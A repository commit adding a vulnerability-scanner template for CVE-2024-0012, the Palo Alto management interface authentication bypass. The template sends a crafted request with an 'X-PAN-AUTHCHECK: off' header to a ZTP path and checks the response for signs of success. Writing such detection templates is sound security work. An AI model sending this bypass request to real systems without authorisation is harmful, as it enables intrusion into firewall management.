Create CVE-2024-0012.yaml
parent
c9248c078a
commit
00f9a4105d
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2024-0012
|
||||
|
||||
info:
|
||||
name: Authentication Bypass in the Management Web Interface
|
||||
author: johnk3r
|
||||
severity: critical
|
||||
tags: cve2024,cve,paloalto,globalprotect
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/php/ztp_gate.php/.js.map"
|
||||
headers:
|
||||
X-PAN-AUTHCHECK: off
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Zero Touch Provisioning</title>"
|
||||
- "Zero Touch Provisioning (ZTP)"
|
||||
- type: word
|
||||
words:
|
||||
- "/scripts/cache/mainui.javascript"
|
||||
part: body
|
Loading…
Reference in New Issue